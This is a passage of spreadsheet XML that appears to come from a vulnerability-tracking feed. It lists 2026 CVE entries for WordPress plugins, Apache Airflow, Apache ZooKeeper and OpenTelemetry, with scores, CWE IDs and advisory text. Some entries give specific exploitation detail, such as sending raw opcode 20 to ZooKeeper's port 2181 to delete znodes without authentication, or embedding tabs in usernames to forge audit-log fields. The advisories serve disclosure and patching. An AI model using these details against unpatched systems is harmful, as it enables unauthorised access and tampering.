      <c r="S1482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76557</t>
        </is>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76558</t>
        </is>
      </c>
      <c r="D1483" s="5" t="inlineStr"/>
      <c r="E1483" s="5" t="inlineStr"/>
      <c r="F1483" s="5" t="inlineStr"/>
      <c r="G1483" s="5" t="inlineStr"/>
      <c r="H1483" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1483" s="5" t="inlineStr"/>
      <c r="J1483" s="5" t="inlineStr"/>
      <c r="K1483" s="5" t="inlineStr"/>
      <c r="L1483" s="5" t="inlineStr"/>
      <c r="M1483" s="5" t="inlineStr"/>
      <c r="N1483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1483" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1483" s="5" t="inlineStr"/>
      <c r="Q1483" s="5" t="inlineStr"/>
      <c r="R1483" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not escape custom field names retrieved from the database before inserting them into the DOM of one of its administration screens, allowing users with a role as low as contributor to perform Stored XSS attacks which will trigger in the browser of a high privileged user, such as an administrator, viewing that screen.</t>
        </is>
      </c>
      <c r="S1483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76558</t>
        </is>
      </c>
    </row>
    <row r="1484">
      <c r="A1484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76559</t>
        </is>
      </c>
      <c r="D1484" s="5" t="inlineStr"/>
      <c r="E1484" s="5" t="inlineStr"/>
      <c r="F1484" s="5" t="inlineStr"/>
      <c r="G1484" s="5" t="inlineStr"/>
      <c r="H1484" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1484" s="5" t="inlineStr"/>
      <c r="J1484" s="5" t="inlineStr"/>
      <c r="K1484" s="5" t="inlineStr"/>
      <c r="L1484" s="5" t="inlineStr"/>
      <c r="M1484" s="5" t="inlineStr"/>
      <c r="N1484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1484" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1484" s="5" t="inlineStr"/>
      <c r="Q1484" s="5" t="inlineStr"/>
      <c r="R1484" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not properly validate URLs before requesting them during the import process, allowing users with the import capability, which administrators hold by default, to make the site issue requests to internal hosts and services and read their responses. This is an incomplete fix for CVE-2026-11397.</t>
        </is>
      </c>
      <c r="S1484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76559</t>
        </is>
      </c>
    </row>
    <row r="1485">
      <c r="A1485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76646</t>
        </is>
      </c>
      <c r="D1485" s="5" t="inlineStr"/>
      <c r="E1485" s="5" t="inlineStr"/>
      <c r="F1485" s="5" t="inlineStr"/>
      <c r="G1485" s="5" t="inlineStr"/>
      <c r="H1485" s="5" t="inlineStr"/>
      <c r="I1485" s="5" t="inlineStr"/>
      <c r="J1485" s="5" t="inlineStr"/>
      <c r="K1485" s="5" t="inlineStr"/>
      <c r="L1485" s="5" t="inlineStr"/>
      <c r="M1485" s="5" t="inlineStr"/>
      <c r="N1485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1485" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1485" s="5" t="inlineStr"/>
      <c r="Q1485" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1485" s="5" t="inlineStr">
        <is>
          <t>A remote attacker could cause excessive resource consumption by supplying specially crafted request parameters, potentially resulting in a denial of service condition.
Older unsupported versions may also be affected.
Users are recommended to upgrade to versions 2.3.12, 2.3-next-M9, 3.0.4, 4.0.4, or 4.1.4, which fix this issue.</t>
        </is>
      </c>
      <c r="S1485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76646</t>
        </is>
      </c>
    </row>
    <row r="1486">
      <c r="A1486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77702</t>
        </is>
      </c>
      <c r="D1486" s="5" t="inlineStr"/>
      <c r="E1486" s="5" t="inlineStr"/>
      <c r="F1486" s="5" t="inlineStr"/>
      <c r="G1486" s="5" t="inlineStr"/>
      <c r="H1486" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1486" s="5" t="inlineStr"/>
      <c r="J1486" s="5" t="inlineStr"/>
      <c r="K1486" s="5" t="inlineStr"/>
      <c r="L1486" s="5" t="inlineStr"/>
      <c r="M1486" s="5" t="inlineStr"/>
      <c r="N1486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1486" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1486" s="5" t="inlineStr"/>
      <c r="Q1486" s="5" t="inlineStr"/>
      <c r="R1486" s="5" t="inlineStr">
        <is>
          <t>The Eventin  WordPress plugin before 4.1.24 does not prevent the token issued to a guest at checkout from being used to change that order's tickets afterwards, allowing unauthenticated users to replace a paid ticket with a free one and complete the order at no charge.</t>
        </is>
      </c>
      <c r="S1486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77702</t>
        </is>
      </c>
    </row>
    <row r="1487">
      <c r="A1487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78472</t>
        </is>
      </c>
      <c r="D1487" s="5" t="inlineStr"/>
      <c r="E1487" s="5" t="inlineStr"/>
      <c r="F1487" s="5" t="inlineStr"/>
      <c r="G1487" s="5" t="inlineStr"/>
      <c r="H1487" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1487" s="5" t="inlineStr"/>
      <c r="J1487" s="5" t="inlineStr"/>
      <c r="K1487" s="5" t="inlineStr"/>
      <c r="L1487" s="5" t="inlineStr"/>
      <c r="M1487" s="5" t="inlineStr"/>
      <c r="N1487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1487" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1487" s="5" t="inlineStr"/>
      <c r="Q1487" s="5" t="inlineStr"/>
      <c r="R1487" s="5" t="inlineStr">
        <is>
          <t>The Ni WooCommerce Sales Report  WordPress plugin before 4.2.0 does not sanitise and escape a parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="S1487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78472</t>
        </is>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78474</t>
        </is>
      </c>
      <c r="D1488" s="5" t="inlineStr"/>
      <c r="E1488" s="5" t="inlineStr"/>
      <c r="F1488" s="5" t="inlineStr"/>
      <c r="G1488" s="5" t="inlineStr"/>
      <c r="H1488" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1488" s="5" t="inlineStr"/>
      <c r="J1488" s="5" t="inlineStr"/>
      <c r="K1488" s="5" t="inlineStr"/>
      <c r="L1488" s="5" t="inlineStr"/>
      <c r="M1488" s="5" t="inlineStr"/>
      <c r="N1488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1488" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1488" s="5" t="inlineStr"/>
      <c r="Q1488" s="5" t="inlineStr"/>
      <c r="R1488" s="5" t="inlineStr">
        <is>
          <t>The Ni WooCommerce Sales Report  WordPress plugin before 4.2.0 does not have any authentication or authorisation checks on one of its report-printing routines, allowing unauthenticated users to retrieve WooCommerce order details and customer contact information, to target an individual order, and to search the store's orders by customer name or email address.</t>
        </is>
      </c>
      <c r="S1488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78474</t>
        </is>
      </c>
    </row>
    <row r="1489">
      <c r="A1489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79298</t>
        </is>
      </c>
      <c r="D1489" s="5" t="inlineStr"/>
      <c r="E1489" s="5" t="inlineStr"/>
      <c r="F1489" s="5" t="inlineStr"/>
      <c r="G1489" s="5" t="inlineStr"/>
      <c r="H1489" s="5" t="inlineStr"/>
      <c r="I1489" s="5" t="inlineStr"/>
      <c r="J1489" s="5" t="inlineStr"/>
      <c r="K1489" s="5" t="inlineStr"/>
      <c r="L1489" s="5" t="inlineStr"/>
      <c r="M1489" s="5" t="inlineStr"/>
      <c r="N1489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1489" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1489" s="5" t="inlineStr"/>
      <c r="Q1489" s="5" t="inlineStr"/>
      <c r="R1489" s="5" t="inlineStr">
        <is>
          <t>An issue in Howyar Technologies Inc SysReturn Versions prior to 11.3.034 and fixed in v.11.3.0.34 allows a local attcker to execute arbitrary code via the BOOTia32.efi and a crafted cloak32.dat file on the ESP.</t>
        </is>
      </c>
      <c r="S1489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79298</t>
        </is>
      </c>
    </row>
    <row r="1490">
      <c r="A1490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79993</t>
        </is>
      </c>
      <c r="D1490" s="5" t="inlineStr"/>
      <c r="E1490" s="5" t="inlineStr"/>
      <c r="F1490" s="5" t="inlineStr"/>
      <c r="G1490" s="5" t="inlineStr"/>
      <c r="H1490" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1490" s="5" t="inlineStr"/>
      <c r="J1490" s="5" t="inlineStr"/>
      <c r="K1490" s="5" t="inlineStr"/>
      <c r="L1490" s="5" t="inlineStr"/>
      <c r="M1490" s="5" t="inlineStr"/>
      <c r="N1490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1490" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1490" s="5" t="inlineStr"/>
      <c r="Q1490" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1490" s="5" t="inlineStr">
        <is>
          <t>The `deleteContainer` opcode (0x14/20) is processed without verifying the caller's ACL permissions, allowing any authenticated client to delete specific znodes in the data tree regardless of the ACL restrictions on the znode or its parent. This opcode is considered internal-only and the official client doesn't have API for it, but a client that can open a plain TCP session on the ZooKeeper client port (2181 by default) - with NO authentication and NO ACL permissions - can delete any empty persistent znode (including regular persistent nodes, container nodes, and TTL nodes) by issuing the raw protocol OpCode deleteContainer (20). The deleteContainer request path completely skips both the session check and the DELETE ACL check that are enforced by the regular delete (OpCode 2) path. This is an authorization bypass / ACL enforcement bug.
This issue affects Apache ZooKeeper: from 3.9.0 through 3.9.5, from 3.8.0 through 3.8.6.
Users are recommended to upgrade to version 3.9.6 or 3.8.7, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79993</t>
        </is>
      </c>
    </row>
    <row r="1491">
      <c r="A1491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1491" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="D1491" s="5" t="inlineStr"/>
      <c r="E1491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1491" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1491" s="5" t="inlineStr"/>
      <c r="H1491" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1491" s="5" t="inlineStr"/>
      <c r="J1491" s="5" t="inlineStr"/>
      <c r="K1491" s="5" t="inlineStr"/>
      <c r="L1491" s="5" t="inlineStr">
        <is>
          <t>nuget:OpenTelemetry.Resources.Host</t>
        </is>
      </c>
      <c r="M1491" s="5" t="inlineStr">
        <is>
          <t>1.16.0-beta.2</t>
        </is>
      </c>
      <c r="N1491" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1491" s="5" t="inlineStr"/>
      <c r="P1491" s="5" t="inlineStr"/>
      <c r="Q1491" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R1491" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `OpenTelemetry.Resources.Host` NuGet package is affected by an untrusted search path vulnerability on macOS. The `host.id` resource attribute detector launches the `sh` and `ioreg` executables by bare name rather than by absolute path, so both are resolved
through the `PATH` environment variable.
A local attacker who is less privileged than the host application, and who can influence `PATH` or write to a directory that appears in `PATH` ahead of the system directories, can have an arbitrary binary executed in the application's security context, resulting in local
code execution/privilege escalation.
### Details
The implementation of the host detector macOS has always invoked `ioreg` and `sh` via their bare names since it was implemented by [open-telemetry/opentelemetry-dotnet-contrib#1631](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/1631).
The vulnerability was fixed by [open-telemetry/opentelemetry-dotnet-contrib#4760](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4760) which executes `ioreg` directly using its absolute path.
### Impact
Applications running on **macOS** that use the `OpenTelemetry.Resources.Host` detector when an attacker who is *less privileged* than the application process can influence `PATH` or write to a `PATH` directory that precedes the system directories (e.g. a higher-privileged service with a user-writable directory in its search path, or a process inheriting an attacker-influenced environment). The attacker gains code execution in the application's security context through an attacker-controlled `ioreg` executable.
### Mitigation
This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected.
### Workarounds
None known.
### References
- [GHSA-9h8m-3fm2-qjrq](https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-9h8m-3fm2-qjrq)
- [open-telemetry/opentelemetry-dotnet-contrib#4760](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4760)
- [CWE-426](https://cwe.mitre.org/data/definitions/426.html)</t>
        </is>
      </c>
      <c r="S1491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="1492">
      <c r="A1492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82124</t>
        </is>
      </c>
      <c r="D1492" s="5" t="inlineStr"/>
      <c r="E1492" s="5" t="inlineStr"/>
      <c r="F1492" s="5" t="inlineStr"/>
      <c r="G1492" s="5" t="inlineStr"/>
      <c r="H1492" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1492" s="5" t="inlineStr"/>
      <c r="J1492" s="5" t="inlineStr"/>
      <c r="K1492" s="5" t="inlineStr"/>
      <c r="L1492" s="5" t="inlineStr"/>
      <c r="M1492" s="5" t="inlineStr"/>
      <c r="N1492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1492" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1492" s="5" t="inlineStr"/>
      <c r="Q1492" s="5" t="inlineStr"/>
      <c r="R1492" s="5" t="inlineStr">
        <is>
          <t>The Schema &amp; Structured Data for WP &amp; AMP WordPress plugin before 1.66 does not check whether a post is password protected before including its content in the structured data it generates, allowing unauthenticated users to obtain the content of password protected posts via more than one public output route.</t>
        </is>
      </c>
      <c r="S1492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82124</t>
        </is>
      </c>
    </row>
    <row r="1493">
      <c r="A1493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82125</t>
        </is>
      </c>
      <c r="D1493" s="5" t="inlineStr"/>
      <c r="E1493" s="5" t="inlineStr"/>
      <c r="F1493" s="5" t="inlineStr"/>
      <c r="G1493" s="5" t="inlineStr"/>
      <c r="H1493" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1493" s="5" t="inlineStr"/>
      <c r="J1493" s="5" t="inlineStr"/>
      <c r="K1493" s="5" t="inlineStr"/>
      <c r="L1493" s="5" t="inlineStr"/>
      <c r="M1493" s="5" t="inlineStr"/>
      <c r="N1493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1493" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1493" s="5" t="inlineStr"/>
      <c r="Q1493" s="5" t="inlineStr"/>
      <c r="R1493" s="5" t="inlineStr">
        <is>
          <t>The Schema &amp; Structured Data for WP &amp; AMP WordPress plugin before 1.66 does not correctly verify the ownership or the moderation status of a comment before returning its content, allowing unauthenticated users to read the content of comments still awaiting moderation or marked as spam.</t>
        </is>
      </c>
      <c r="S1493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82125</t>
        </is>
      </c>
    </row>
    <row r="1494">
      <c r="A1494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82126</t>
        </is>
      </c>
      <c r="D1494" s="5" t="inlineStr"/>
      <c r="E1494" s="5" t="inlineStr"/>
      <c r="F1494" s="5" t="inlineStr"/>
      <c r="G1494" s="5" t="inlineStr"/>
      <c r="H1494" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1494" s="5" t="inlineStr"/>
      <c r="J1494" s="5" t="inlineStr"/>
      <c r="K1494" s="5" t="inlineStr"/>
      <c r="L1494" s="5" t="inlineStr"/>
      <c r="M1494" s="5" t="inlineStr"/>
      <c r="N1494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1494" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1494" s="5" t="inlineStr"/>
      <c r="Q1494" s="5" t="inlineStr"/>
      <c r="R1494" s="5" t="inlineStr">
        <is>
          <t>The Schema &amp; Structured Data for WP &amp; AMP WordPress plugin before 1.66 does not check that a user is allowed to edit the specific post they request schema generation for, allowing users with the contributor role and above to obtain the content of other users' draft, pending, private and password protected posts.</t>
        </is>
      </c>
      <c r="S1494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82126</t>
        </is>
      </c>
    </row>
    <row r="1495">
      <c r="A1495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82310</t>
        </is>
      </c>
      <c r="D1495" s="5" t="inlineStr"/>
      <c r="E1495" s="5" t="inlineStr"/>
      <c r="F1495" s="5" t="inlineStr"/>
      <c r="G1495" s="5" t="inlineStr"/>
      <c r="H1495" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1495" s="5" t="inlineStr"/>
      <c r="J1495" s="5" t="inlineStr"/>
      <c r="K1495" s="5" t="inlineStr"/>
      <c r="L1495" s="5" t="inlineStr"/>
      <c r="M1495" s="5" t="inlineStr"/>
      <c r="N1495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1495" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1495" s="5" t="inlineStr"/>
      <c r="Q1495" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R1495" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider: deactivating a user account does not stop tokens issued to that account before deactivation. Password authentication correctly rejects the disabled account, but the Core API continues to accept an existing, unexpired token naming it, and lets that token mint a replacement — so the account keeps its role-scoped access indefinitely after an administrator has disabled it. The user replays their own legitimate credential; no signature forgery or privilege escalation is involved, and the access stays within the roles the account already held.
Affects deployments using Airflow 3 with the FAB auth manager and Core API token authentication, where an administrator deactivates an account whose row remains in the database and whose previously issued token has not expired. The trigger is administrative deactivation as a containment action, which silently fails to contain.
Users of apache-airflow-providers-fab are recommended to upgrade to version 3.9.0 or later, which rejects tokens naming a deactivated account.</t>
        </is>
      </c>
      <c r="S1495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82310</t>
        </is>
      </c>
    </row>
    <row r="1496">
      <c r="A1496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82311</t>
        </is>
      </c>
      <c r="D1496" s="5" t="inlineStr"/>
      <c r="E1496" s="5" t="inlineStr"/>
      <c r="F1496" s="5" t="inlineStr"/>
      <c r="G1496" s="5" t="inlineStr"/>
      <c r="H1496" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1496" s="5" t="inlineStr"/>
      <c r="J1496" s="5" t="inlineStr"/>
      <c r="K1496" s="5" t="inlineStr"/>
      <c r="L1496" s="5" t="inlineStr"/>
      <c r="M1496" s="5" t="inlineStr"/>
      <c r="N1496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1496" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1496" s="5" t="inlineStr"/>
      <c r="Q1496" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R1496" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider: resetting a user's password does not delete that user's existing database-backed sessions, despite documented behaviour that it does. The cleanup compares the string identifier Flask-Login stores in the session against the user's integer database identifier, so the comparison never matches and no session is removed. An attacker who already holds a copy of the victim's session cookie keeps access as that user after the password change, so the reset does not evict them.
Affects deployments using the FAB auth manager with `[fab] session_backend=database`. The trigger is an administrator (or the user) running the supported password-reset command as a containment action after a session cookie has been compromised; the secure-cookie backend is out of scope, as it documents that it cannot centrally delete sessions.
apache-airflow-providers-fab 3.9.0 also fixes CVE-2026-86462, a second, independent route to the same outcome via the Admin user-edit endpoint; a single upgrade closes both.
Users of apache-airflow-providers-fab are recommended to upgrade to version 3.9.0 or later, which compares the identifiers consistently.</t>
        </is>
      </c>
      <c r="S1496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82311</t>
        </is>
      </c>
    </row>
    <row r="1497">
      <c r="A1497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84088</t>
        </is>
      </c>
      <c r="D1497" s="5" t="inlineStr"/>
      <c r="E1497" s="5" t="inlineStr"/>
      <c r="F1497" s="5" t="inlineStr"/>
      <c r="G1497" s="5" t="inlineStr"/>
      <c r="H1497" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1497" s="5" t="inlineStr"/>
      <c r="J1497" s="5" t="inlineStr"/>
      <c r="K1497" s="5" t="inlineStr"/>
      <c r="L1497" s="5" t="inlineStr"/>
      <c r="M1497" s="5" t="inlineStr"/>
      <c r="N1497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1497" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1497" s="5" t="inlineStr"/>
      <c r="Q1497" s="5" t="inlineStr"/>
      <c r="R1497" s="5" t="inlineStr">
        <is>
          <t>The Xpro Addons — 140+ Widgets for Elementor WordPress plugin before 1.7.9 does not validate or sanitize a widget link setting before storing and using it in a JavaScript navigation call, allowing users with the contributor role and above to inject and store JavaScript that executes in the browser of anyone who interacts with the affected widget.</t>
        </is>
      </c>
      <c r="S1497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84088</t>
        </is>
      </c>
    </row>
    <row r="1498">
      <c r="A1498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84439</t>
        </is>
      </c>
      <c r="D1498" s="5" t="inlineStr"/>
      <c r="E1498" s="5" t="inlineStr"/>
      <c r="F1498" s="5" t="inlineStr"/>
      <c r="G1498" s="5" t="inlineStr"/>
      <c r="H1498" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1498" s="5" t="inlineStr"/>
      <c r="J1498" s="5" t="inlineStr"/>
      <c r="K1498" s="5" t="inlineStr"/>
      <c r="L1498" s="5" t="inlineStr"/>
      <c r="M1498" s="5" t="inlineStr"/>
      <c r="N1498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1498" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1498" s="5" t="inlineStr"/>
      <c r="Q1498" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="R1498" s="5" t="inlineStr">
        <is>
          <t>When audit logging is enabled (zookeeper.audit.enable=true), an unauthenticated attacker can inject arbitrary fields into Apache ZooKeeper's audit log by sending a digest authentication request with tab characters (\t) embedded in the username. Because the audit log uses tab-separated key=value format, the injected tabs are parsed as legitimate field separators, allowing the attacker to spoof audit results (e.g., injecting result=success), forge operation types, and corrupt forensic evidence.
A log injection vulnerability in Apache ZooKeeper allows a client that can call setACL to inject forged key-value fields into zookeeper_audit.log. When audit logging is enabled, the server serializes attacker-controlled digest ACL ids into the acl= audit field without escaping tab characters. Because audit events are emitted as tab-separated key=value records, a crafted ACL id can make one successful setAcl event appear to contain forged fields such as operation=delete and znode=/forged. This undermines the integrity of downstream audit parsing, alerting, and incident response.
This issue affects Apache ZooKeeper: from 3.9.0 through 3.9.5, from 3.8.0 through 3.8.6.
Users are recommended to upgrade to version 3.9.6 or 3.8.7, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84439</t>
        </is>
      </c>
    </row>
    <row r="1499">
      <c r="A1499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84829</t>
        </is>
      </c>
      <c r="D1499" s="5" t="inlineStr"/>
      <c r="E1499" s="5" t="inlineStr"/>
      <c r="F1499" s="5" t="inlineStr"/>
      <c r="G1499" s="5" t="inlineStr"/>
      <c r="H1499" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1499" s="5" t="inlineStr"/>
      <c r="J1499" s="5" t="inlineStr"/>
